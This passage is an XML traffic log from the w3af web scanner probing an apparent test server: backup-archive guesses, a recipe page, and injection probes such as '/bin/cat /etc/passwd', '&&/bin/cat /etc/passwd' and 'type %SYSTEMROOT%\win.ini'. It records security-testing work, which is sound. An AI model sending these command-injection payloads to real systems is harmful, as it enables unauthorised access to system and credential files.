                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="239">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="239">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="240">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="240">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="241">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="241">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="242">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="242">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="243">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="243">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="244">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="244">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="245">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="245">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="246">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="246">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="247">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="247">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="249">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="249">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="250">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="250">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Choucroute Garnie&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;1/3 cup kosher salt, plus more for seasoning&lt;/li&gt;
        &lt;li&gt;2 tablespoons light brown sugar&lt;/li&gt;
        &lt;li&gt;3 pounds pork back ribs or baby back ribs, cut into 3 sections&lt;/li&gt;
        &lt;li&gt;6 pounds sauerkraut (in plastic bags), drained&lt;/li&gt;
        &lt;li&gt;1/4 cup duck or goose fat or peanut oil&lt;/li&gt;
        &lt;li&gt;1 large onion, coarsely chopped&lt;/li&gt;
        &lt;li&gt;4 large garlic cloves, coarsely chopped&lt;/li&gt;
        &lt;li&gt;20 juniper berries&lt;/li&gt;
        &lt;li&gt;3 large bay leaves&lt;/li&gt;
        &lt;li&gt;1/2 teaspoon caraway seeds&lt;/li&gt;
        &lt;li&gt;1 teaspoon freshly ground black pepper&lt;/li&gt;
        &lt;li&gt;3 cups chicken stock&lt;/li&gt;
        &lt;li&gt;1 1/2 cups Riesling or Pinot Gris&lt;/li&gt;
        &lt;li&gt;2 pounds Polish kielbasa, skinned and cut into 2-inch pieces&lt;/li&gt;
        &lt;li&gt;10 skinless hot dogs&lt;/li&gt;
        &lt;li&gt;One 2-pound piece of boneless boiled ham (3 to 4 inches wide), sliced 1/4 inch thick&lt;/li&gt;
        &lt;li&gt;2 pounds medium potatoes (about 10), peeled&lt;/li&gt;
        &lt;li&gt;Assorted mustards, for serving&lt;/li&gt;
    &lt;/ul&gt;

    &lt;a href='/choucroute'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="251">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="251">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="252">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="252">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="253">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="253">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="255">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/Response.Write%28new+String%28%22iyyrl%22%2C5%29%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="255">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="584" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Response.Write%28new+String%28%22iyyrl%22%2C5%29%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="256">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/print+%27iyyrl%27x5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="256">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about print+%27iyyrl%27x5 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='print+%27iyyrl%27x5'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="257">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/echo+str_repeat%28%27iyyrl%27%2C5%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="257">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about echo+str_repeat%28%27iyyrl%27%2C5%29%3B has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='echo+str_repeat%28%27iyyrl%27%2C5%29%3B'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="259">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/print+%27iyyrl%27%2A5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="259">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about print+%27iyyrl%27%2A5 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='print+%27iyyrl%27%2A5'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="262">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="262">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="265">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%26%26/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="265">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="266">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="266">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="564" field="content-length"/>
                    </headers>
